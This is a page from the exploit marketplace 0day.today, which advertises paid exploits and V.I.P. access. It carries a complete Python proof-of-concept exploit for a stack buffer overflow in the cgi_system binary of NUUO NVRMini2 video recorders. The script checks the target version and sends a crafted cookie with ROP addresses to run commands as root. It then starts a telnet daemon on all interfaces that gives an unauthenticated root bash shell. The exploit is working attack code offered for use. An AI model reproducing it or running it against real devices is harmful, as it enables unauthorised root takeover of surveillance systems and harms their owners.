0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NUUO NVRMini2 3.8 - cgi_system Buffer Overflow (Enable Telnet) Exploit
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet) # Exploit Author: Jacob Baines # Vendor Homepage: https://www.nuuo.com/ # Device: NRVMini2 # Software Link: https://www.nuuo.com/ProductNode.php?node=2 # Versions: 3.8.0 and below # Tested Against: 03.07.0000.0011 and 03.08.0000.0005 # Tested on: Ubuntu and OSX # CVE: N/A # TRA: https://www.tenable.com/security/research/tra-2018-25 # Description: # A stack buffer overflow exists in the cgi_system binary. The error occurs # due to lack of bounds checking on the PHPSESSID value before and when # it is passed to sprintf in order to generate the session id file name. # As written, this exploit enables Telnet. # Executes a command via the stack buffer overflow in cookie parsing. The command # is executed via 'system' as root. The overlow logic is like so: # # address 1: 405e2e34 - load system into r3 and address 2 into lr # # .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR} # .text:000D0E38 1E FF 2F E1 BX LR # # address 2: 406037cc - load the system command into r0. Jump to system. # # .text:000F17CC 0D 00 A0 E1 MOV R0, SP # .text:000F17D0 33 FF 2F E1 BLX R3 # # [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ] # \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat # PoC import requests import socket import sys def stack_buffer_overflow(command, ip, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print '[+] Executing %s on %s:%s...' % (command, ip, port) sock.connect((ip, int(port))) exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' + 'Host: ' + ip + ':' + port + '\r\n' + 'Accept: */*\r\n' + 'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' + 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' + '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command + '\r\n\r\n') sock.sendall(exec_request) data = sock.recv(1024) sock.close() # We should get a 500 Internal error in response return data.find('500') != -1 # Quickly tries to grab the version of the target. If the target is # using anything other than 3.7 or 3.8 then we'll bail out since # haven't tested on any other targets def check_target(ip, port): index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo") return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1) if __name__ == "__main__": if (len(sys.argv) != 3): print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>" sys.exit(1) ip = sys.argv[1] port = sys.argv[2] if int(port) > 65535: print('[-] Invalid port parameter') sys.exit(0) if len(ip.split('.')) != 4: print('[-] Invalid IP address parameter') sys.exit(0) print '[+] Checking for a valid target...' if (check_target(ip, port) == False): print('[-] The target is not a NVRMini2 or its using an untested version.') sys.exit(0) print '[+] Valid target!' if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False): print('[-] Mount failed') sys.exit(0) if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False): print('[-] telnetd bind failed') sys.exit(0) print('[+] Success!') # 0day.today [2024-09-28] #